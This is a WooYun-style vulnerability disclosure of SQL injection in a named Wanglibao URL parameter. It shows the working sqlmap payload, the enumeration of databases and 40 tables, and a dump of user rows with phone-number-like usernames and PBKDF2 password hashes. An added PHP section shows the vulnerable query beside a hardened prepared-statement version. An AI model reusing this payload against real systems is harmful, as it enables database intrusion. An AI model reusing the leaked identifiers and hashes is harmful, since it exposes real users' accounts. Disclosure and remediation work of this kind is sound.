WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online --- http://drop.zone.ci/
2016-01-04: Details reported to the vendor; awaiting vendor response
2016-01-06: Vendor confirmed; details disclosed to the vendor only
2016-01-16: Details disclosed to core white hats and domain experts
2016-01-26: Details disclosed to regular white hats
2016-02-05: Details disclosed to intern white hats
2016-02-20: Details disclosed to the public
Financial security must not be overlooked. I saw the Wanglibao CEO at a finance conference; I wonder whether your vulnerabilities come with a gift attached.
#SQL injection
http://source.wanglibao.com/monthly.php?action=detail&project_id=2619
Injection as shown (payload):
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: project_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=detail&project_id=2619' AND 4993=4993 AND 'slIZ'='slIZ
---
[17:48:46] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.14, Nginx
back-end DBMS: MySQL 5
[17:48:46] [INFO] fetching database names
[17:48:46] [INFO] fetching number of databases
[17:48:46] [INFO] resumed: 4
[17:48:46] [INFO] resumed: information_schema
[17:48:46] [INFO] resumed: passport
[17:48:47] [INFO] resumed: test
[17:48:47] [INFO] resumed: wanglibao
available databases [4]:
[*] information_schema
[*] passport
[*] test
[*] wanglibao
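The payload above opens with a single quote, which is consistent with `project_id` being spliced into a quoted SQL literal on the server. The report does not include Wanglibao's source, so the following is an added illustration, not the project's code: a hypothetical PHP 5.6 handler for the `detail` action in its vulnerable form beside a hardened form that validates the parameter as an integer and binds it through a PDO prepared statement. The table name `project`, the column name `project_id`, the function names and the DSN are all assumptions.

```php
<?php
// Added example (not Wanglibao's code, which the report does not show).
// Assumptions: a MySQL table `project` keyed by an integer `project_id`,
// and a PDO connection $pdo. Written for PHP 5.6 to match the reported stack.

// BEFORE (hypothetical): the raw GET value is spliced into a quoted SQL
// literal. The reported payload
//     2619' AND 4993=4993 AND 'slIZ'='slIZ
// closes that quote and appends a condition whose truth the client controls,
// which is exactly what sqlmap's boolean-based blind test detects.
function getProjectVulnerable(PDO $pdo, array $query)
{
    $sql = "SELECT * FROM project WHERE project_id = '" . $query['project_id'] . "'";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// AFTER: validate the parameter as a positive integer, then bind it as a
// typed placeholder so user input can never change the SQL text.
function getProjectHardened(PDO $pdo, array $query)
{
    $raw = isset($query['project_id']) ? $query['project_id'] : null;
    $id  = filter_var($raw, FILTER_VALIDATE_INT, array('options' => array('min_range' => 1)));
    if ($id === false) {
        // Treat as a client error. A rejected value like the payload above is
        // also a useful signal to log for detection.
        return null;
    }
    $stmt = $pdo->prepare('SELECT * FROM project WHERE project_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Connection setup: real server-side prepares (no client-side emulation) and
// exceptions instead of silent false returns. Use a DB account limited to this
// application's own database; the sqlmap output shows the account in use could
// also enumerate `passport` and `test`, which a project detail page never needs.
function connect($dsn, $user, $pass)
{
    return new PDO($dsn, $user, $pass, array(
        PDO::ATTR_EMULATE_PREPARES => false,
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    ));
}

// Usage with a constructed request carrying the reported payload
// (DSN and credentials are placeholders):
// $pdo = connect('mysql:host=127.0.0.1;dbname=wanglibao;charset=utf8mb4', 'app_user', 'PLACEHOLDER');
// var_dump(getProjectHardened($pdo, array('project_id' => "2619' AND 4993=4993 AND 'slIZ'='slIZ")));  // NULL: rejected before any query runs
// var_dump(getProjectHardened($pdo, array('project_id' => '2619')));  // the row, or NULL if no such project
```

The integer check alone would already defeat this payload, but the prepared statement is the control that holds when a later parameter is a string rather than an id; keeping both means validation handles the 400 case and binding handles everything else.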
#Tables in the wanglibao database:
Database: wanglibao
[40 tables]
+------------------------+
| user                   |
| access                 |
| admin_actor            |
| admin_actor_group      |
| admin_actor_permission |
| admin_permission       |
| admin_permission_group |
| admin_user             |
| adminuser              |
| agreement_template     |
| amortization           |
| attchment              |
| bank                   |
| buy_exchange           |
| buy_exchange_purchase  |
| buydetail              |
| category               |
| codes                  |
| comfirm                |
| company                |
| contract               |
| coupon                 |
| dbcache                |
| filepool               |
| id_genter              |
| loginlog               |
| node                   |
| oncontract             |
| op_log                 |
| operationlog           |
| project                |
| project_addon          |
| project_agreement      |
| project_detail         |
| role                   |
| sessions               |
| sqs_content            |
| sysinfo                |
| system_log             |
| user_amortization      |
+------------------------+
#Did not dig further into the financial data; dumped part of the USER table only to make the point.
Database: wanglibao
Table: user
[6 entries]
+----+-------------+-------------------------------------------------------------------------------+
| id | name        | password                                                                      |
+----+-------------+-------------------------------------------------------------------------------+
| 1  | 13910562833 | pbkdf2_sha256$12000$gEdb355E6tSC$pZ4QJxOFuRVWvuippiTFyjS+uWVOlIPWDlhWWYe7kr8= |
| 2  | 13910562433 | pbkdf2_sha256$12000$lZ7HuO4jqIMS$25o5BMM2Nyg9mdvNnBb9mBWhF45JjAu220Hqti8SgeM= |
| 3  | 13910563421 | pbkdf2_sha256$12000$j6EF1sEIwhk0$Ntw399lGkswW/+bEledT0ZjT9wM+R9NS2tHy4nn4cdA= |
| 4  | 13269296780 | pbkdf2_sha256$12000$NP4jJnluNTCH$7HmCLwNCuN2Hj3DwU3J5aNPqseWw5ynqypP86PCLQic= |
| 5  | 17601645914 | pbkdf2_sha256$12000$76rYfEgZal5B$g3KuEZAeIBuZcCdX2aRsIQt/6lnorxoB0o/sUXOYQys= |
I am here for the gift.
Severity: Medium
Vulnerability Rank: 9
Confirmed: 2016-01-06 23:23
Remediation scheduled
2016-01-26: This was a test environment; already fixed.